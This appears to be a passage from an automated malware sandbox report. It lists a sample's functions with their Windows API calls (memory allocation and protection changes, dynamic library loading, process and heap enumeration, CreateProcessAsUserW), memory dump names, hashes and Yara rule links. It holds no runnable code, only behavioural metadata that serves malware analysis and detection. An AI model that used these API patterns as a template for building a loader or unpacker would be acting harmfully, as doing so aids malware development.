                                                                                                                                                • Opcode ID: 88b03a9a21f863f14479d1feee9f3f23c5a00ba75dbac96dfa7e331bc54643ba
                                                                                                                                                • Instruction ID: 26af8576340048de3430999a72b18f42400ff8df4d6d9490f9c2f0f16d1812bf
                                                                                                                                                • Opcode Fuzzy Hash: 88b03a9a21f863f14479d1feee9f3f23c5a00ba75dbac96dfa7e331bc54643ba
                                                                                                                                                • Instruction Fuzzy Hash: 6481A9B1D00228AFDB61DB64CC55BDEBBB8AF49704F0081D9E60DB6281DB755B84CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004968AF, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 00496A0E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID: $@
                                                                                                                                                • API String ID: 544645111-1077428164
                                                                                                                                                • Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                • Instruction ID: 3a130887b8ca1edc836106803fa62228ec3ea30709df9660be58108d9c7dddee
                                                                                                                                                • Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                • Instruction Fuzzy Hash: 855108B4A00219DFDB08CF88D590BADBBF2FF88314F158259E406AB394D735A985CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004963BF, Relevance: 3.9, APIs: 3, Instructions: 156COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                • Instruction ID: 11b50270cd810076d1eb4b439b85e9b0697e071d7fc060bdc4a274b747103f56
                                                                                                                                                • Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                • Instruction Fuzzy Hash: BE610CB4E00209EFDF04CF94D895AAEBBB1BF48314F118169E905AB345D374E981CFA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00496C06, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00496B66
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                • Opcode ID: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
                                                                                                                                                • Instruction ID: b692662554fdf5fb19ff4b9827adedce19166edc5e3a8710521df6bbd06d5aa6
                                                                                                                                                • Opcode Fuzzy Hash: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
                                                                                                                                                • Instruction Fuzzy Hash: 7141A674A0421ADFCF08CF88C890BBEBBB1FF48304F258569E515AB395D734A941CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00495F51, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RtlExitUserProcess.NTDLL(00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495FDC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitProcessUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3902816426-0
                                                                                                                                                • Opcode ID: ed4079702a49fbbd7f3e6e9966e09eaea25f58def5707f05d86400b04c106375
                                                                                                                                                • Instruction ID: 09d0a76cf425fa79ed9f89c51127b5e7e730523a7ddbbdbd5452570a5d42e12b
                                                                                                                                                • Opcode Fuzzy Hash: ed4079702a49fbbd7f3e6e9966e09eaea25f58def5707f05d86400b04c106375
                                                                                                                                                • Instruction Fuzzy Hash: 3501EDB2E00118AFDF64DBA4DC51FEAB379AF4D304F0085E9B60DA6241DA355E80CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004967AF, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(00001000,00000000,00001000,00000004,?,004964F6,?,?), ref: 00496873
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                • Instruction ID: 0c79c16543167986a93a92f931b952afb032c984907d65328680b433e07df2ac
                                                                                                                                                • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                • Instruction Fuzzy Hash: 8141BBB4E00209DFCB08CF84C990AAEB7B5BF88304F218599E915AB355D735EE51CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004964F5, Relevance: 1.3, APIs: 1, Instructions: 68memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004964A9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 9cb46efddb22f13334e8a9b75164fb4080135cd7d7fdece749b04495215ba953
                                                                                                                                                • Instruction ID: 83fc7aca7995ced2d13b36fa05aea382624067eaeceb46ea016a2c7075335e90
                                                                                                                                                • Opcode Fuzzy Hash: 9cb46efddb22f13334e8a9b75164fb4080135cd7d7fdece749b04495215ba953
                                                                                                                                                • Instruction Fuzzy Hash: 882119B5E00109AFCF04CFA4D891DAEBBB5BF88314F1181A9EA04AB345D635E941CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00496480, Relevance: 1.3, APIs: 1, Instructions: 67memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004964A9
                                                                                                                                                  • Part of subcall function 004967AF: VirtualAlloc.KERNELBASE(00001000,00000000,00001000,00000004,?,004964F6,?,?), ref: 00496873
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: a48b14e0d67def59de494df9450b26c235f79b4bd1f42c1a9e5b8037933ecf93
                                                                                                                                                • Instruction ID: e3c49596b105349c375f5a8fda8ca4edc49443407a8a1a9de2d9e69037e30244
                                                                                                                                                • Opcode Fuzzy Hash: a48b14e0d67def59de494df9450b26c235f79b4bd1f42c1a9e5b8037933ecf93
                                                                                                                                                • Instruction Fuzzy Hash: 9F2171B5E00109AFCF40CFE4D891DAEBBB5BF8C314F118299E914A7345D638E942CBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00496410, Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000004,?,?,00496383,WorkIn,00000000,?,?,?,?), ref: 00496413
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,0000001C,00003000,00000004,?,?,00496383,WorkIn,00000000), ref: 0049644D
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004964A9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 802be24639beb6097a8b506a0a1b11d72c9be6878d2412fb9918f3aa228db220
                                                                                                                                                • Instruction ID: e8e3e5f25cd71a06307a66e1c40e84d6942a56d6c4222ec9d3207b11ecfa1e68
                                                                                                                                                • Opcode Fuzzy Hash: 802be24639beb6097a8b506a0a1b11d72c9be6878d2412fb9918f3aa228db220
                                                                                                                                                • Instruction Fuzzy Hash: DFE01A70D0020DAFEF10CEE1D409BAF7BB0AB48715F00C06AE9026A280C27849519F26
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 004560A0, Relevance: 123.1, APIs: 43, Strings: 27, Instructions: 603libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL,185A3E5D,?,?,00000001,?,0043F744), ref: 00456105
                                                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL,?,?,00000001,?,0043F744), ref: 0045610F
                                                                                                                                                • LoadLibraryA.KERNEL32(NETAPI32.DLL,?,?,00000001,?,0043F744), ref: 0045611B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0045613E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 00456149
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000001,?,0043F744), ref: 004561E2
                                                                                                                                                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004561F7
                                                                                                                                                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00456202
                                                                                                                                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0045620D
                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000001,?,0043F744), ref: 004562F3
                                                                                                                                                • GetVersion.KERNEL32(?,?,00000001,?,0043F744), ref: 004562F9
                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,?,?,00000001,?,0043F744), ref: 00456318
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 0045632E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCursorInfo), ref: 00456339
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetQueueStatus), ref: 00456344
                                                                                                                                                • GetVersion.KERNEL32(?,?,00000001,?,0043F744), ref: 00456378
                                                                                                                                                • GetVersion.KERNEL32(?,?,00000001,?,0043F744), ref: 00456385
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000001,?,0043F744), ref: 004563F9
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00456414
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0045641E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00456429
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00456434
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0045643F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0045644A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00456455
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00456460
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0045646B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00456476
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00456481
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0045648C
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00456528
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045660E
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00456660
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045668A
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004566E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045670A
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0045676C
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00456787
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountTick$Library$Load$FreeVersion
                                                                                                                                                • String ID: ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                • API String ID: 1087946788-2556708411
                                                                                                                                                • Opcode ID: 9fe23b561ca91406333ee38a62108d9db0617adee58660e7e6143efbcb595282
                                                                                                                                                • Instruction ID: 57a1450b2fc923af4d97f76896b3bd8946af58d7ad92491ed6776b3b257cdbec
                                                                                                                                                • Opcode Fuzzy Hash: 9fe23b561ca91406333ee38a62108d9db0617adee58660e7e6143efbcb595282
                                                                                                                                                • Instruction Fuzzy Hash: DB327370D002189BDF10EFE5DC85BEEBBB8FF08705F51416AE905A7282DB789944CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004A47EC, Relevance: 66.4, APIs: 44, Instructions: 431COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ___getlocaleinfo
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1937885557-0
                                                                                                                                                • Opcode ID: 8d616f1f61380d85d2a5857ca11f2a7ffc32f5a42b27233d85adefce8a41491e
                                                                                                                                                • Instruction ID: b47b2687838c0f32e0724138ee110684e2ab6b631e6618b371d3e3f876cfcd4b
                                                                                                                                                • Opcode Fuzzy Hash: 8d616f1f61380d85d2a5857ca11f2a7ffc32f5a42b27233d85adefce8a41491e
                                                                                                                                                • Instruction Fuzzy Hash: DBE1E2B290020DBEEF11DAF1CD85DFF7BBDEB04748F04092AB355D2141EA75AA099764
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041B161, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 119libraryloaderprocessCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041B166
                                                                                                                                                • _memset.LIBCMT ref: 0041B1CE
                                                                                                                                                • LoadLibraryW.KERNEL32(userenv.dll), ref: 0041B1FE
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0041B217
                                                                                                                                                • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041B223
                                                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000030,?,00000000,00000044,00000000), ref: 0041B25F
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B26F
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0041B27D
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041B296
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0041B2A4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle$AddressLibraryProc$CreateFreeH_prologLoadProcessUser_memset
                                                                                                                                                • String ID: "%s" %s$0$CreateEnvironmentBlock$D$DestroyEnvironmentBlock$userenv.dll$|P
                                                                                                                                                • API String ID: 1615916502-1693829574
                                                                                                                                                • Opcode ID: dc44699519551521a02e1f7afd78f6c1ab08d25c90df6f1015458facb40e5ad0
                                                                                                                                                • Instruction ID: ddf75ef95b9bfa407689728afd416bfbd2e9170abf5b722496d8987d0478cdaf
                                                                                                                                                • Opcode Fuzzy Hash: dc44699519551521a02e1f7afd78f6c1ab08d25c90df6f1015458facb40e5ad0
                                                                                                                                                • Instruction Fuzzy Hash: 78412871C00109EFDF119FA5DD85AEEBBBAFF08345B24802AE505B6251D7399E44CBA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004C2B17, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 292COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ./\
                                                                                                                                                • API String ID: 0-3176372042
                                                                                                                                                • Opcode ID: 89969cbcba66b1a890d39cb7e6bf5d987a0a5ec44a70bcdebff5a03e4d31018a
                                                                                                                                                • Instruction ID: b34a3abf89ba8b54027160294b75f095ec42f9710c156fd9d2ac31434d017dcc
                                                                                                                                                • Opcode Fuzzy Hash: 89969cbcba66b1a890d39cb7e6bf5d987a0a5ec44a70bcdebff5a03e4d31018a
                                                                                                                                                • Instruction Fuzzy Hash: D6A1A4B5C00619AEDB60EFA5CD44EAEB7F8BF08311B10412FF419E7641E7B89940CB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00412C23, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 116libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00412C38
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process), ref: 00412C50
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00412C53
                                                                                                                                                • _memset.LIBCMT ref: 00412C92
                                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00412CA1
